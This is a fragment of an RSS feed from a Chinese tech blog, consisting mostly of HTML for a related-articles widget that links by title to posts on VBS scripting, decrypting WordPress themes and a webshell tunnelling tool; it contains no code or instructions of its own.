                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">vbs脚本实现普通用户以管理员权限运行程序</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="VBS脚本得到CPU使用率，硬盘使用率和内存使用率" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fvbs-get-cpu-harddisk-ram-rate%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/12/09/12114386.gif" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">VBS脚本得到CPU使用率，硬盘使用率和内存使用率</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="解密被加密的wordpress主题" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fto-decrypt-encrypted-wordpress-themes%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/23/11350651.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">解密被加密的wordpress主题</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="webshell跳板reDuh使用说明" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fwebshell-proxy-reduh%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvbs-code-encode-and-unencode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9292452.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">webshell跳板reDuh使用说明</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></content:encoded>
			<wfw:commentRss>http://www.fendou.info/vbs-code-encode-and-unencode/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
	</channel>
</rss>

